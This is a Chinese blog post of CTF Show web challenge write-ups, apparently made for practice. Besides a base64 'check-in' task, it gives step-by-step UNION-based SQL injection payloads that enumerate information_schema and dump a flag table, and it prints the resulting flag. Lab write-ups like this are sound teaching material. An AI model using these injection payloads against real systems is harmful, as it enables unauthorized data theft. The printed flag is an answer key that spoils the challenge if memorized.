10.25 web方向刷题笔记

最新推荐文章于 2024-06-20 11:07:23 发布
最新推荐文章于 2024-06-20 11:07:23 发布
阅读量62 收藏
点赞数
分类专栏: 刷题笔记 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74806803/article/details/134038791
版权

题目来源:CTF Show

一、web签到题

1.按F12查看源代码,发现一串奇怪的绿色字符,判断为base642.采用base64解码工具获得flag

签到成功,耶~~~

二、web2(最简单的SQL注入)

1.先万能密码碰碰运气,发现成功回显

2.判断数据库字段数

1' union select 1,2,3#

发现从1~4无回显,而1~3有回显,且回显位置为2

3.查数据库名及表名

1' union select 1,database(),3#    -------------回显为web2

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2' ),3#

 4.发现flag表,爆出flag表字段

1' union select 1,( select group_concat(column_name) from information_schema.columns  where  table_schema='web2'  and  table_name='flag' ),3#

5.发现flag表字段名也为flag,爆出flag字段数据

1' union select 1,flag,3 from flag#

 

获得flag{1d4d791c-28b2-4cd3-ae09-3cbef8913519} 

BlackH.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WavePad(声音编辑软件) v10.25官方版
10-18
WavePad是一款Windows声音编辑程序,能制作和编辑语音和其他音频录音。能剪切、复制和粘贴录音部分;如果需要还能添加回声、扩大和减噪效果。它还是WAV和MP3文件的编辑器,支持许多
高德地图_v10.25.0.3249_华为版.apk
11-30
高德地图_v10.25.0.3249_华为版
10.25面试.md
10-25
10.25面试.md
进制 10.25 熊.xmind
11-01
进制 10.25 熊.xmind
随心笔记,第六更
leen的博客
06-13 565
今天给大家分享的是使用idea 将xml转为JavaBean,并且取其中的数据和其他的数据进行交互。
论文阅读笔记:DepGraph: Towards Any Structural Pruning
HollowKnightz的博客
06-15 1496
论文阅读笔记:DepGraph: Towards Any Structural Pruning
libspice源文件笔记
cai742925624的专栏
06-18 128
libspice源文件笔记
【Java学习笔记】异常处理
最新发布
diguangxihua的博客
06-20 649
除了Java中提供的一些异常类,还可以根据自己的需求定义异常类。//声明UserOwnException无参数构造方法//声明UserOwnException带有String类型参数的构造方法super();//调用父类的构造方法try {execute();//调用execute()方法try {//抛出异常//捕获Exception类//捕获后,直接抛出用户自定义异常类throw new UserOwnException("自定义异常抛出"+e.getMessage())
通信原理第八章复习笔记
香草味冰淇淋
06-17 536
由于16QAM信号的16个信号点在水平轴和垂直轴上投影的电平数均有4个(+3、+1、-1、-3),对应低通滤波器输出的4电平基带信号,因而4电平判决器应有3个判决电平:+2、0、-2。大圆上的四个红点表示第一个QPSK信号适量的位置,在这4个位置上可以叠加第二个QPSK矢量,后者的位置用虚线小圆上的4个小黑点表示;每个码元周期内含有1/4载波周期的整数倍,且两种码元包含的正弦波数相差1/2个周期,功率谱衰减快。在多径衰落信道中,信号振幅和相位取值越多,收到的影响越大,因而星型比方型更具有吸引力;
算法刷题笔记 区间和(离散化二分查找难题,带超详细注释的C++实现)详细解析
hanmo22357的博客
06-14 742
一道较难的离散化二分查找例题,以及带有超级详细注释和解析的C++代码实现。
GRIT论文阅读笔记
read, note and comment papers
06-18 194
一篇试图统一生成任务和编码任务的工作,就是把只能完成生成任务的GPT改成既能生成又能encode。 思路其实很简单,就是在输入的时候添加instruction tokens来指引模型做representation还是generation,然后各自算损失。representation任务用的是document和query的对比学习。把最后一层的token给mean pooling(只对word tokens做,不对instruction做)出一个embedding算对比损失,做generation的时候就
【数据库系统概论复习】关系数据库与关系代数笔记
weixin_73588491的博客
06-15 573
*DBMS 数据库管理系统 ** ,数据库要放硬盘,好麻烦,牛的程序员给我们做了一个软件, 让我们可以方便的建库, 建表,做权限控制等,这就是DBMS。(6)统计每门课程的学生选修人数(超过10人的课程才统计),要求输出课程号和选修人数,查询结果按选修人数降序排列,若人数相同,则按课程号升序排列。参与表的主码为职工号和编号,职工号为外码,被参照表为职工表,参照属性为职工号,编号为外码,被参照表为社会团体表,参照属性为编号。L中有属性就分组,如果只有聚合函数,就是简单的聚合函数,不会分组,如题11。
树莓派4B学习笔记11:PC端网线SSH连接树莓派_网线连接请求超时问题解决
NULL指向我的博客
06-17 381
今日学习使用网线连接树莓派,网线可以提供更快的数据传输速率,比无线网更稳定
JAVA学习笔记DAY6——SSM_Spring
weixin_47227105的博客
06-13 615
Spring Ioc容器是复杂容器。一个项目project拆分成多个模块module。配置方式包括三种:xml、注解、配置类。从文件结构的角度看,框架=jar包+是SSM的一种简化,快速创建服务。用来维护不同服务的相互调用。控制层组件 Servlet。业务逻辑层 Service。持久化层组件 Dao。
Python学习笔记7:入门知识(七)
weixin_48668564的博客
06-13 1407
Python入门知识:字符串知识补充
Shell 学习笔记 - 导读 + 变量定义
z339521的博客
06-16 827
程序是在内存中运行的。在程序运行过程中,内存空间内的某些值是变化的,这个内存空间就称为变量。为了便于操作,可以对这个空间进行命名,这个名称就是变量名。简单来说,变量就是用一个特定的字符串去表示不固定的内容,变量的名称必须是合法的标识符。内存空间内的值就是变量值,在声明变量时可以不赋值,也可以直接赋给初值。变量其实就是用来放置数值等内容的 “盒子”,想要使用这个可以存放数值等内容的魔法盒,就必须遵循一定的规则,首先需要提前进行如下定义。变量名 = 变量值在Shell。
【电路笔记】-共集极放大器
视觉与物联智能
06-15 854
本文介绍另一种用于放大信号的双极晶体管架构,通常称为共集电极放大器 (CCA)。 CCA 有时也可以称为射极跟随器放大器,我们将在本文后面了解其原因。
telnet 172.17.10.25 11211
09-28
telnet 172.17.10.25 11211 是用于与 Memcached 服务器建立连接的命令。当你执行该命令后,如果成功连接到了目标服务器的11211端口,你就可以通过telnet会话与服务器进行交互,发送命令并接收响应。 请注意,对于我...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BlackH.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值